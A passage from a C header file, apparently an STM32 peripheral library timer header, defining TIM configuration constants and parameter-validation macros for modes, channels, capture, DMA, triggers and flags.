\ ((PERIPH) == TIM6) || \ ((PERIPH) == TIM7) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM9) || \ ((PERIPH) == TIM10)|| \ ((PERIPH) == TIM11)|| \ ((PERIPH) == TIM12)|| \ ((PERIPH) == TIM13)|| \ ((PERIPH) == TIM14)|| \ ((PERIPH) == TIM15)|| \ ((PERIPH) == TIM16)|| \ ((PERIPH) == TIM17)) /* LIST1: TIM 1 and 8 */ #define IS_TIM_LIST1_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM8)) /* LIST2: TIM 1, 8, 15 16 and 17 */ #define IS_TIM_LIST2_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM15)|| \ ((PERIPH) == TIM16)|| \ ((PERIPH) == TIM17)) /* LIST3: TIM 1, 2, 3, 4, 5 and 8 */ #define IS_TIM_LIST3_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM8)) /* LIST4: TIM 1, 2, 3, 4, 5, 8, 15, 16 and 17 */ #define IS_TIM_LIST4_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM15)|| \ ((PERIPH) == TIM16)|| \ ((PERIPH) == TIM17)) /* LIST5: TIM 1, 2, 3, 4, 5, 8 and 15 */ #define IS_TIM_LIST5_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM15)) /* LIST6: TIM 1, 2, 3, 4, 5, 8, 9, 12 and 15 */ #define IS_TIM_LIST6_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM9) || \ ((PERIPH) == TIM12)|| \ ((PERIPH) == TIM15)) /* LIST7: TIM 1, 2, 3, 4, 5, 6, 7, 8, 9, 12 and 15 */ #define IS_TIM_LIST7_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM6) || \ ((PERIPH) == TIM7) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM9) || \ ((PERIPH) == TIM12)|| \ ((PERIPH) == TIM15)) /* LIST8: TIM 1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 13, 14, 15, 16 and 17 */ #define IS_TIM_LIST8_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM9) || \ ((PERIPH) == TIM10)|| \ ((PERIPH) == TIM11)|| \ ((PERIPH) == TIM12)|| \ ((PERIPH) == TIM13)|| \ ((PERIPH) == TIM14)|| \ ((PERIPH) == TIM15)|| \ ((PERIPH) == TIM16)|| \ ((PERIPH) == TIM17)) /* LIST9: TIM 1, 2, 3, 4, 5, 6, 7, 8, 15, 16, and 17 */ #define IS_TIM_LIST9_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM6) || \ ((PERIPH) == TIM7) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM15)|| \ ((PERIPH) == TIM16)|| \ ((PERIPH) == TIM17)) /** * @} */ /** @defgroup TIM_Output_Compare_and_PWM_modes * @{ */ #define TIM_OCMode_Timing ((uint16_t)0x0000) #define TIM_OCMode_Active ((uint16_t)0x0010) #define TIM_OCMode_Inactive ((uint16_t)0x0020) #define TIM_OCMode_Toggle ((uint16_t)0x0030) #define TIM_OCMode_PWM1 ((uint16_t)0x0060) #define TIM_OCMode_PWM2 ((uint16_t)0x0070) #define IS_TIM_OC_MODE(MODE) (((MODE) == TIM_OCMode_Timing) || \ ((MODE) == TIM_OCMode_Active) || \ ((MODE) == TIM_OCMode_Inactive) || \ ((MODE) == TIM_OCMode_Toggle)|| \ ((MODE) == TIM_OCMode_PWM1) || \ ((MODE) == TIM_OCMode_PWM2)) #define IS_TIM_OCM(MODE) (((MODE) == TIM_OCMode_Timing) || \ ((MODE) == TIM_OCMode_Active) || \ ((MODE) == TIM_OCMode_Inactive) || \ ((MODE) == TIM_OCMode_Toggle)|| \ ((MODE) == TIM_OCMode_PWM1) || \ ((MODE) == TIM_OCMode_PWM2) || \ ((MODE) == TIM_ForcedAction_Active) || \ ((MODE) == TIM_ForcedAction_InActive)) /** * @} */ /** @defgroup TIM_One_Pulse_Mode * @{ */ #define TIM_OPMode_Single ((uint16_t)0x0008) #define TIM_OPMode_Repetitive ((uint16_t)0x0000) #define IS_TIM_OPM_MODE(MODE) (((MODE) == TIM_OPMode_Single) || \ ((MODE) == TIM_OPMode_Repetitive)) /** * @} */ /** @defgroup TIM_Channel * @{ */ #define TIM_Channel_1 ((uint16_t)0x0000) #define TIM_Channel_2 ((uint16_t)0x0004) #define TIM_Channel_3 ((uint16_t)0x0008) #define TIM_Channel_4 ((uint16_t)0x000C) #define IS_TIM_CHANNEL(CHANNEL) (((CHANNEL) == TIM_Channel_1) || \ ((CHANNEL) == TIM_Channel_2) || \ ((CHANNEL) == TIM_Channel_3) || \ ((CHANNEL) == TIM_Channel_4)) #define IS_TIM_PWMI_CHANNEL(CHANNEL) (((CHANNEL) == TIM_Channel_1) || \ ((CHANNEL) == TIM_Channel_2)) #define IS_TIM_COMPLEMENTARY_CHANNEL(CHANNEL) (((CHANNEL) == TIM_Channel_1) || \ ((CHANNEL) == TIM_Channel_2) || \ ((CHANNEL) == TIM_Channel_3)) /** * @} */ /** @defgroup TIM_Clock_Division_CKD * @{ */ #define TIM_CKD_DIV1 ((uint16_t)0x0000) #define TIM_CKD_DIV2 ((uint16_t)0x0100) #define TIM_CKD_DIV4 ((uint16_t)0x0200) #define IS_TIM_CKD_DIV(DIV) (((DIV) == TIM_CKD_DIV1) || \ ((DIV) == TIM_CKD_DIV2) || \ ((DIV) == TIM_CKD_DIV4)) /** * @} */ /** @defgroup TIM_Counter_Mode * @{ */ #define TIM_CounterMode_Up ((uint16_t)0x0000) #define TIM_CounterMode_Down ((uint16_t)0x0010) #define TIM_CounterMode_CenterAligned1 ((uint16_t)0x0020) #define TIM_CounterMode_CenterAligned2 ((uint16_t)0x0040) #define TIM_CounterMode_CenterAligned3 ((uint16_t)0x0060) #define IS_TIM_COUNTER_MODE(MODE) (((MODE) == TIM_CounterMode_Up) || \ ((MODE) == TIM_CounterMode_Down) || \ ((MODE) == TIM_CounterMode_CenterAligned1) || \ ((MODE) == TIM_CounterMode_CenterAligned2) || \ ((MODE) == TIM_CounterMode_CenterAligned3)) /** * @} */ /** @defgroup TIM_Output_Compare_Polarity * @{ */ #define TIM_OCPolarity_High ((uint16_t)0x0000) #define TIM_OCPolarity_Low ((uint16_t)0x0002) #define IS_TIM_OC_POLARITY(POLARITY) (((POLARITY) == TIM_OCPolarity_High) || \ ((POLARITY) == TIM_OCPolarity_Low)) /** * @} */ /** @defgroup TIM_Output_Compare_N_Polarity * @{ */ #define TIM_OCNPolarity_High ((uint16_t)0x0000) #define TIM_OCNPolarity_Low ((uint16_t)0x0008) #define IS_TIM_OCN_POLARITY(POLARITY) (((POLARITY) == TIM_OCNPolarity_High) || \ ((POLARITY) == TIM_OCNPolarity_Low)) /** * @} */ /** @defgroup TIM_Output_Compare_state * @{ */ #define TIM_OutputState_Disable ((uint16_t)0x0000) #define TIM_OutputState_Enable ((uint16_t)0x0001) #define IS_TIM_OUTPUT_STATE(STATE) (((STATE) == TIM_OutputState_Disable) || \ ((STATE) == TIM_OutputState_Enable)) /** * @} */ /** @defgroup TIM_Output_Compare_N_state * @{ */ #define TIM_OutputNState_Disable ((uint16_t)0x0000) #define TIM_OutputNState_Enable ((uint16_t)0x0004) #define IS_TIM_OUTPUTN_STATE(STATE) (((STATE) == TIM_OutputNState_Disable) || \ ((STATE) == TIM_OutputNState_Enable)) /** * @} */ /** @defgroup TIM_Capture_Compare_state * @{ */ #define TIM_CCx_Enable ((uint16_t)0x0001) #define TIM_CCx_Disable ((uint16_t)0x0000) #define IS_TIM_CCX(CCX) (((CCX) == TIM_CCx_Enable) || \ ((CCX) == TIM_CCx_Disable)) /** * @} */ /** @defgroup TIM_Capture_Compare_N_state * @{ */ #define TIM_CCxN_Enable ((uint16_t)0x0004) #define TIM_CCxN_Disable ((uint16_t)0x0000) #define IS_TIM_CCXN(CCXN) (((CCXN) == TIM_CCxN_Enable) || \ ((CCXN) == TIM_CCxN_Disable)) /** * @} */ /** @defgroup Break_Input_enable_disable * @{ */ #define TIM_Break_Enable ((uint16_t)0x1000) #define TIM_Break_Disable ((uint16_t)0x0000) #define IS_TIM_BREAK_STATE(STATE) (((STATE) == TIM_Break_Enable) || \ ((STATE) == TIM_Break_Disable)) /** * @} */ /** @defgroup Break_Polarity * @{ */ #define TIM_BreakPolarity_Low ((uint16_t)0x0000) #define TIM_BreakPolarity_High ((uint16_t)0x2000) #define IS_TIM_BREAK_POLARITY(POLARITY) (((POLARITY) == TIM_BreakPolarity_Low) || \ ((POLARITY) == TIM_BreakPolarity_High)) /** * @} */ /** @defgroup TIM_AOE_Bit_Set_Reset * @{ */ #define TIM_AutomaticOutput_Enable ((uint16_t)0x4000) #define TIM_AutomaticOutput_Disable ((uint16_t)0x0000) #define IS_TIM_AUTOMATIC_OUTPUT_STATE(STATE) (((STATE) == TIM_AutomaticOutput_Enable) || \ ((STATE) == TIM_AutomaticOutput_Disable)) /** * @} */ /** @defgroup Lock_level * @{ */ #define TIM_LOCKLevel_OFF ((uint16_t)0x0000) #define TIM_LOCKLevel_1 ((uint16_t)0x0100) #define TIM_LOCKLevel_2 ((uint16_t)0x0200) #define TIM_LOCKLevel_3 ((uint16_t)0x0300) #define IS_TIM_LOCK_LEVEL(LEVEL) (((LEVEL) == TIM_LOCKLevel_OFF) || \ ((LEVEL) == TIM_LOCKLevel_1) || \ ((LEVEL) == TIM_LOCKLevel_2) || \ ((LEVEL) == TIM_LOCKLevel_3)) /** * @} */ /** @defgroup OSSI_Off_State_Selection_for_Idle_mode_state * @{ */ #define TIM_OSSIState_Enable ((uint16_t)0x0400) #define TIM_OSSIState_Disable ((uint16_t)0x0000) #define IS_TIM_OSSI_STATE(STATE) (((STATE) == TIM_OSSIState_Enable) || \ ((STATE) == TIM_OSSIState_Disable)) /** * @} */ /** @defgroup OSSR_Off_State_Selection_for_Run_mode_state * @{ */ #define TIM_OSSRState_Enable ((uint16_t)0x0800) #define TIM_OSSRState_Disable ((uint16_t)0x0000) #define IS_TIM_OSSR_STATE(STATE) (((STATE) == TIM_OSSRState_Enable) || \ ((STATE) == TIM_OSSRState_Disable)) /** * @} */ /** @defgroup TIM_Output_Compare_Idle_State * @{ */ #define TIM_OCIdleState_Set ((uint16_t)0x0100) #define TIM_OCIdleState_Reset ((uint16_t)0x0000) #define IS_TIM_OCIDLE_STATE(STATE) (((STATE) == TIM_OCIdleState_Set) || \ ((STATE) == TIM_OCIdleState_Reset)) /** * @} */ /** @defgroup TIM_Output_Compare_N_Idle_State * @{ */ #define TIM_OCNIdleState_Set ((uint16_t)0x0200) #define TIM_OCNIdleState_Reset ((uint16_t)0x0000) #define IS_TIM_OCNIDLE_STATE(STATE) (((STATE) == TIM_OCNIdleState_Set) || \ ((STATE) == TIM_OCNIdleState_Reset)) /** * @} */ /** @defgroup TIM_Input_Capture_Polarity * @{ */ #define TIM_ICPolarity_Rising ((uint16_t)0x0000) #define TIM_ICPolarity_Falling ((uint16_t)0x0002) #define TIM_ICPolarity_BothEdge ((uint16_t)0x000A) #define IS_TIM_IC_POLARITY(POLARITY) (((POLARITY) == TIM_ICPolarity_Rising) || \ ((POLARITY) == TIM_ICPolarity_Falling)) #define IS_TIM_IC_POLARITY_LITE(POLARITY) (((POLARITY) == TIM_ICPolarity_Rising) || \ ((POLARITY) == TIM_ICPolarity_Falling)|| \ ((POLARITY) == TIM_ICPolarity_BothEdge)) /** * @} */ /** @defgroup TIM_Input_Capture_Selection * @{ */ #define TIM_ICSelection_DirectTI ((uint16_t)0x0001) /*!< TIM Input 1, 2, 3 or 4 is selected to be connected to IC1, IC2, IC3 or IC4, respectively */ #define TIM_ICSelection_IndirectTI ((uint16_t)0x0002) /*!< TIM Input 1, 2, 3 or 4 is selected to be connected to IC2, IC1, IC4 or IC3, respectively. */ #define TIM_ICSelection_TRC ((uint16_t)0x0003) /*!< TIM Input 1, 2, 3 or 4 is selected to be connected to TRC. */ #define IS_TIM_IC_SELECTION(SELECTION) (((SELECTION) == TIM_ICSelection_DirectTI) || \ ((SELECTION) == TIM_ICSelection_IndirectTI) || \ ((SELECTION) == TIM_ICSelection_TRC)) /** * @} */ /** @defgroup TIM_Input_Capture_Prescaler * @{ */ #define TIM_ICPSC_DIV1 ((uint16_t)0x0000) /*!< Capture performed each time an edge is detected on the capture input. */ #define TIM_ICPSC_DIV2 ((uint16_t)0x0004) /*!< Capture performed once every 2 events. */ #define TIM_ICPSC_DIV4 ((uint16_t)0x0008) /*!< Capture performed once every 4 events. */ #define TIM_ICPSC_DIV8 ((uint16_t)0x000C) /*!< Capture performed once every 8 events. */ #define IS_TIM_IC_PRESCALER(PRESCALER) (((PRESCALER) == TIM_ICPSC_DIV1) || \ ((PRESCALER) == TIM_ICPSC_DIV2) || \ ((PRESCALER) == TIM_ICPSC_DIV4) || \ ((PRESCALER) == TIM_ICPSC_DIV8)) /** * @} */ /** @defgroup TIM_interrupt_sources * @{ */ #define TIM_IT_Update ((uint16_t)0x0001) #define TIM_IT_CC1 ((uint16_t)0x0002) #define TIM_IT_CC2 ((uint16_t)0x0004) #define TIM_IT_CC3 ((uint16_t)0x0008) #define TIM_IT_CC4 ((uint16_t)0x0010) #define TIM_IT_COM ((uint16_t)0x0020) #define TIM_IT_Trigger ((uint16_t)0x0040) #define TIM_IT_Break ((uint16_t)0x0080) #define IS_TIM_IT(IT) ((((IT) & (uint16_t)0xFF00) == 0x0000) && ((IT) != 0x0000)) #define IS_TIM_GET_IT(IT) (((IT) == TIM_IT_Update) || \ ((IT) == TIM_IT_CC1) || \ ((IT) == TIM_IT_CC2) || \ ((IT) == TIM_IT_CC3) || \ ((IT) == TIM_IT_CC4) || \ ((IT) == TIM_IT_COM) || \ ((IT) == TIM_IT_Trigger) || \ ((IT) == TIM_IT_Break)) /** * @} */ /** @defgroup TIM_DMA_Base_address * @{ */ #define TIM_DMABase_CR1 ((uint16_t)0x0000) #define TIM_DMABase_CR2 ((uint16_t)0x0001) #define TIM_DMABase_SMCR ((uint16_t)0x0002) #define TIM_DMABase_DIER ((uint16_t)0x0003) #define TIM_DMABase_SR ((uint16_t)0x0004) #define TIM_DMABase_EGR ((uint16_t)0x0005) #define TIM_DMABase_CCMR1 ((uint16_t)0x0006) #define TIM_DMABase_CCMR2 ((uint16_t)0x0007) #define TIM_DMABase_CCER ((uint16_t)0x0008) #define TIM_DMABase_CNT ((uint16_t)0x0009) #define TIM_DMABase_PSC ((uint16_t)0x000A) #define TIM_DMABase_ARR ((uint16_t)0x000B) #define TIM_DMABase_RCR ((uint16_t)0x000C) #define TIM_DMABase_CCR1 ((uint16_t)0x000D) #define TIM_DMABase_CCR2 ((uint16_t)0x000E) #define TIM_DMABase_CCR3 ((uint16_t)0x000F) #define TIM_DMABase_CCR4 ((uint16_t)0x0010) #define TIM_DMABase_BDTR ((uint16_t)0x0011) #define TIM_DMABase_DCR ((uint16_t)0x0012) #define IS_TIM_DMA_BASE(BASE) (((BASE) == TIM_DMABase_CR1) || \ ((BASE) == TIM_DMABase_CR2) || \ ((BASE) == TIM_DMABase_SMCR) || \ ((BASE) == TIM_DMABase_DIER) || \ ((BASE) == TIM_DMABase_SR) || \ ((BASE) == TIM_DMABase_EGR) || \ ((BASE) == TIM_DMABase_CCMR1) || \ ((BASE) == TIM_DMABase_CCMR2) || \ ((BASE) == TIM_DMABase_CCER) || \ ((BASE) == TIM_DMABase_CNT) || \ ((BASE) == TIM_DMABase_PSC) || \ ((BASE) == TIM_DMABase_ARR) || \ ((BASE) == TIM_DMABase_RCR) || \ ((BASE) == TIM_DMABase_CCR1) || \ ((BASE) == TIM_DMABase_CCR2) || \ ((BASE) == TIM_DMABase_CCR3) || \ ((BASE) == TIM_DMABase_CCR4) || \ ((BASE) == TIM_DMABase_BDTR) || \ ((BASE) == TIM_DMABase_DCR)) /** * @} */ /** @defgroup TIM_DMA_Burst_Length * @{ */ #define TIM_DMABurstLength_1Transfer ((uint16_t)0x0000) #define TIM_DMABurstLength_2Transfers ((uint16_t)0x0100) #define TIM_DMABurstLength_3Transfers ((uint16_t)0x0200) #define TIM_DMABurstLength_4Transfers ((uint16_t)0x0300) #define TIM_DMABurstLength_5Transfers ((uint16_t)0x0400) #define TIM_DMABurstLength_6Transfers ((uint16_t)0x0500) #define TIM_DMABurstLength_7Transfers ((uint16_t)0x0600) #define TIM_DMABurstLength_8Transfers ((uint16_t)0x0700) #define TIM_DMABurstLength_9Transfers ((uint16_t)0x0800) #define TIM_DMABurstLength_10Transfers ((uint16_t)0x0900) #define TIM_DMABurstLength_11Transfers ((uint16_t)0x0A00) #define TIM_DMABurstLength_12Transfers ((uint16_t)0x0B00) #define TIM_DMABurstLength_13Transfers ((uint16_t)0x0C00) #define TIM_DMABurstLength_14Transfers ((uint16_t)0x0D00) #define TIM_DMABurstLength_15Transfers ((uint16_t)0x0E00) #define TIM_DMABurstLength_16Transfers ((uint16_t)0x0F00) #define TIM_DMABurstLength_17Transfers ((uint16_t)0x1000) #define TIM_DMABurstLength_18Transfers ((uint16_t)0x1100) #define IS_TIM_DMA_LENGTH(LENGTH) (((LENGTH) == TIM_DMABurstLength_1Transfer) || \ ((LENGTH) == TIM_DMABurstLength_2Transfers) || \ ((LENGTH) == TIM_DMABurstLength_3Transfers) || \ ((LENGTH) == TIM_DMABurstLength_4Transfers) || \ ((LENGTH) == TIM_DMABurstLength_5Transfers) || \ ((LENGTH) == TIM_DMABurstLength_6Transfers) || \ ((LENGTH) == TIM_DMABurstLength_7Transfers) || \ ((LENGTH) == TIM_DMABurstLength_8Transfers) || \ ((LENGTH) == TIM_DMABurstLength_9Transfers) || \ ((LENGTH) == TIM_DMABurstLength_10Transfers) || \ ((LENGTH) == TIM_DMABurstLength_11Transfers) || \ ((LENGTH) == TIM_DMABurstLength_12Transfers) || \ ((LENGTH) == TIM_DMABurstLength_13Transfers) || \ ((LENGTH) == TIM_DMABurstLength_14Transfers) || \ ((LENGTH) == TIM_DMABurstLength_15Transfers) || \ ((LENGTH) == TIM_DMABurstLength_16Transfers) || \ ((LENGTH) == TIM_DMABurstLength_17Transfers) || \ ((LENGTH) == TIM_DMABurstLength_18Transfers)) /** * @} */ /** @defgroup TIM_DMA_sources * @{ */ #define TIM_DMA_Update ((uint16_t)0x0100) #define TIM_DMA_CC1 ((uint16_t)0x0200) #define TIM_DMA_CC2 ((uint16_t)0x0400) #define TIM_DMA_CC3 ((uint16_t)0x0800) #define TIM_DMA_CC4 ((uint16_t)0x1000) #define TIM_DMA_COM ((uint16_t)0x2000) #define TIM_DMA_Trigger ((uint16_t)0x4000) #define IS_TIM_DMA_SOURCE(SOURCE) ((((SOURCE) & (uint16_t)0x80FF) == 0x0000) && ((SOURCE) != 0x0000)) /** * @} */ /** @defgroup TIM_External_Trigger_Prescaler * @{ */ #define TIM_ExtTRGPSC_OFF ((uint16_t)0x0000) #define TIM_ExtTRGPSC_DIV2 ((uint16_t)0x1000) #define TIM_ExtTRGPSC_DIV4 ((uint16_t)0x2000) #define TIM_ExtTRGPSC_DIV8 ((uint16_t)0x3000) #define IS_TIM_EXT_PRESCALER(PRESCALER) (((PRESCALER) == TIM_ExtTRGPSC_OFF) || \ ((PRESCALER) == TIM_ExtTRGPSC_DIV2) || \ ((PRESCALER) == TIM_ExtTRGPSC_DIV4) || \ ((PRESCALER) == TIM_ExtTRGPSC_DIV8)) /** * @} */ /** @defgroup TIM_Internal_Trigger_Selection * @{ */ #define TIM_TS_ITR0 ((uint16_t)0x0000) #define TIM_TS_ITR1 ((uint16_t)0x0010) #define TIM_TS_ITR2 ((uint16_t)0x0020) #define TIM_TS_ITR3 ((uint16_t)0x0030) #define TIM_TS_TI1F_ED ((uint16_t)0x0040) #define TIM_TS_TI1FP1 ((uint16_t)0x0050) #define TIM_TS_TI2FP2 ((uint16_t)0x0060) #define TIM_TS_ETRF ((uint16_t)0x0070) #define IS_TIM_TRIGGER_SELECTION(SELECTION) (((SELECTION) == TIM_TS_ITR0) || \ ((SELECTION) == TIM_TS_ITR1) || \ ((SELECTION) == TIM_TS_ITR2) || \ ((SELECTION) == TIM_TS_ITR3) || \ ((SELECTION) == TIM_TS_TI1F_ED) || \ ((SELECTION) == TIM_TS_TI1FP1) || \ ((SELECTION) == TIM_TS_TI2FP2) || \ ((SELECTION) == TIM_TS_ETRF)) #define IS_TIM_INTERNAL_TRIGGER_SELECTION(SELECTION) (((SELECTION) == TIM_TS_ITR0) || \ ((SELECTION) == TIM_TS_ITR1) || \ ((SELECTION) == TIM_TS_ITR2) || \ ((SELECTION) == TIM_TS_ITR3)) /** * @} */ /** @defgroup TIM_TIx_External_Clock_Source * @{ */ #define TIM_TIxExternalCLK1Source_TI1 ((uint16_t)0x0050) #define TIM_TIxExternalCLK1Source_TI2 ((uint16_t)0x0060) #define TIM_TIxExternalCLK1Source_TI1ED ((uint16_t)0x0040) #define IS_TIM_TIXCLK_SOURCE(SOURCE) (((SOURCE) == TIM_TIxExternalCLK1Source_TI1) || \ ((SOURCE) == TIM_TIxExternalCLK1Source_TI2) || \ ((SOURCE) == TIM_TIxExternalCLK1Source_TI1ED)) /** * @} */ /** @defgroup TIM_External_Trigger_Polarity * @{ */ #define TIM_ExtTRGPolarity_Inverted ((uint16_t)0x8000) #define TIM_ExtTRGPolarity_NonInverted ((uint16_t)0x0000) #define IS_TIM_EXT_POLARITY(POLARITY) (((POLARITY) == TIM_ExtTRGPolarity_Inverted) || \ ((POLARITY) == TIM_ExtTRGPolarity_NonInverted)) /** * @} */ /** @defgroup TIM_Prescaler_Reload_Mode * @{ */ #define TIM_PSCReloadMode_Update ((uint16_t)0x0000) #define TIM_PSCReloadMode_Immediate ((uint16_t)0x0001) #define IS_TIM_PRESCALER_RELOAD(RELOAD) (((RELOAD) == TIM_PSCReloadMode_Update) || \ ((RELOAD) == TIM_PSCReloadMode_Immediate)) /** * @} */ /** @defgroup TIM_Forced_Action * @{ */ #define TIM_ForcedAction_Active ((uint16_t)0x0050) #define TIM_ForcedAction_InActive ((uint16_t)0x0040) #define IS_TIM_FORCED_ACTION(ACTION) (((ACTION) == TIM_ForcedAction_Active) || \ ((ACTION) == TIM_ForcedAction_InActive)) /** * @} */ /** @defgroup TIM_Encoder_Mode * @{ */ #define TIM_EncoderMode_TI1 ((uint16_t)0x0001) #define TIM_EncoderMode_TI2 ((uint16_t)0x0002) #define TIM_EncoderMode_TI12 ((uint16_t)0x0003) #define IS_TIM_ENCODER_MODE(MODE) (((MODE) == TIM_EncoderMode_TI1) || \ ((MODE) == TIM_EncoderMode_TI2) || \ ((MODE) == TIM_EncoderMode_TI12)) /** * @} */ /** @defgroup TIM_Event_Source * @{ */ #define TIM_EventSource_Update ((uint16_t)0x0001) #define TIM_EventSource_CC1 ((uint16_t)0x0002) #define TIM_EventSource_CC2 ((uint16_t)0x0004) #define TIM_EventSource_CC3 ((uint16_t)0x0008) #define TIM_EventSource_CC4 ((uint16_t)0x0010) #define TIM_EventSource_COM ((uint16_t)0x0020) #define TIM_EventSource_Trigger ((uint16_t)0x0040) #define TIM_EventSource_Break ((uint16_t)0x0080) #define IS_TIM_EVENT_SOURCE(SOURCE) ((((SOURCE) & (uint16_t)0xFF00) == 0x0000) && ((SOURCE) != 0x0000)) /** * @} */ /** @defgroup TIM_Update_Source * @{ */ #define TIM_UpdateSource_Global ((uint16_t)0x0000) /*!< Source of update is the counter overflow/underflow or the setting of UG bit, or an update generation through the slave mode controller. */ #define TIM_UpdateSource_Regular ((uint16_t)0x0001) /*!< Source of update is counter overflow/underflow. */ #define IS_TIM_UPDATE_SOURCE(SOURCE) (((SOURCE) == TIM_UpdateSource_Global) || \ ((SOURCE) == TIM_UpdateSource_Regular)) /** * @} */ /** @defgroup TIM_Output_Compare_Preload_State * @{ */ #define TIM_OCPreload_Enable ((uint16_t)0x0008) #define TIM_OCPreload_Disable ((uint16_t)0x0000) #define IS_TIM_OCPRELOAD_STATE(STATE) (((STATE) == TIM_OCPreload_Enable) || \ ((STATE) == TIM_OCPreload_Disable)) /** * @} */ /** @defgroup TIM_Output_Compare_Fast_State * @{ */ #define TIM_OCFast_Enable ((uint16_t)0x0004) #define TIM_OCFast_Disable ((uint16_t)0x0000) #define IS_TIM_OCFAST_STATE(STATE) (((STATE) == TIM_OCFast_Enable) || \ ((STATE) == TIM_OCFast_Disable)) /** * @} */ /** @defgroup TIM_Output_Compare_Clear_State * @{ */ #define TIM_OCClear_Enable ((uint16_t)0x0080) #define TIM_OCClear_Disable ((uint16_t)0x0000) #define IS_TIM_OCCLEAR_STATE(STATE) (((STATE) == TIM_OCClear_Enable) || \ ((STATE) == TIM_OCClear_Disable)) /** * @} */ /** @defgroup TIM_Trigger_Output_Source * @{ */ #define TIM_TRGOSource_Reset ((uint16_t)0x0000) #define TIM_TRGOSource_Enable ((uint16_t)0x0010) #define TIM_TRGOSource_Update ((uint16_t)0x0020) #define TIM_TRGOSource_OC1 ((uint16_t)0x0030) #define TIM_TRGOSource_OC1Ref ((uint16_t)0x0040) #define TIM_TRGOSource_OC2Ref ((uint16_t)0x0050) #define TIM_TRGOSource_OC3Ref ((uint16_t)0x0060) #define TIM_TRGOSource_OC4Ref ((uint16_t)0x0070) #define IS_TIM_TRGO_SOURCE(SOURCE) (((SOURCE) == TIM_TRGOSource_Reset) || \ ((SOURCE) == TIM_TRGOSource_Enable) || \ ((SOURCE) == TIM_TRGOSource_Update) || \ ((SOURCE) == TIM_TRGOSource_OC1) || \ ((SOURCE) == TIM_TRGOSource_OC1Ref) || \ ((SOURCE) == TIM_TRGOSource_OC2Ref) || \ ((SOURCE) == TIM_TRGOSource_OC3Ref) || \ ((SOURCE) == TIM_TRGOSource_OC4Ref)) /** * @} */ /** @defgroup TIM_Slave_Mode * @{ */ #define TIM_SlaveMode_Reset ((uint16_t)0x0004) #define TIM_SlaveMode_Gated ((uint16_t)0x0005) #define TIM_SlaveMode_Trigger ((uint16_t)0x0006) #define TIM_SlaveMode_External1 ((uint16_t)0x0007) #define IS_TIM_SLAVE_MODE(MODE) (((MODE) == TIM_SlaveMode_Reset) || \ ((MODE) == TIM_SlaveMode_Gated) || \ ((MODE) == TIM_SlaveMode_Trigger) || \ ((MODE) == TIM_SlaveMode_External1)) /** * @} */ /** @defgroup TIM_Master_Slave_Mode * @{ */ #define TIM_MasterSlaveMode_Enable ((uint16_t)0x0080) #define TIM_MasterSlaveMode_Disable ((uint16_t)0x0000) #define IS_TIM_MSM_STATE(STATE) (((STATE) == TIM_MasterSlaveMode_Enable) || \ ((STATE) == TIM_MasterSlaveMode_Disable)) /** * @} */ /** @defgroup TIM_Flags * @{ */ #define TIM_FLAG_Update ((uint16_t)0x0001) #define TIM_FLAG_CC1 ((uint16_t)0x0002) #define TIM_FLAG_CC2 ((uint16_t)0x0004) #define TIM_FLAG_CC3 ((uint16_t)0x0008) #define TIM_FLAG_CC4 ((uint16_t)0x0010) #define TIM_FLAG_COM ((uint16_t)0x0020) #define TIM_FLAG_Trigger ((uint16_t)0x0040) #define TIM_FLAG_Break ((uint16_t)0x0080) #define TIM_FLAG_CC1OF ((uint16_t)0x0200) #define TIM_FLAG_CC2OF ((uint16_t)0x0400) #define TIM_FLAG_CC3OF ((uint16_t)0x0800) #define TIM_FLAG_CC4OF ((uint16_t)0x1000) #define IS_TIM_GET_FLAG(FLAG) (((FLAG) == TIM_FLAG_Update) || \ ((FLAG) == TIM_FLAG_CC1) || \ ((FLAG) == TIM_FLAG_CC2) || \ ((FLAG) == TIM_FLAG_CC3) || \ ((FLAG) == TIM_FLAG_CC4) || \ ((FLAG) == TIM_FLAG_COM) || \ ((FLAG) == TIM_FLAG_Trigger) || \ ((FLAG) == TIM_FLAG_Break) || \ ((FLAG) == TIM_FLAG_CC1OF) || \ ((FLAG) == TIM_FLAG_CC2OF) || \ ((FLAG) == TIM_FLAG_CC3OF) || \ ((FLAG) == TIM_FLAG_CC4OF)) #define IS_TIM_CLEAR_FLAG(TIM_FLAG) ((((TIM_FLAG) & (uint16_t)0xE100) == 0x0000) && ((TIM_FLAG) != 0x0000)) /** * @} */ /** @defgroup TIM_Input_Capture_Filer_Value * @{ */ #define IS_TIM_IC_FILTER(ICFILTER) ((ICFILTER) <= 0xF) /** * @} */ /** @defgroup TIM_External_Trigger_Filter * @{ */ #define IS_TIM_EXT_FILTER(EXTFILTER) ((EXTFILTER) <= 0xF) /** * @} */ 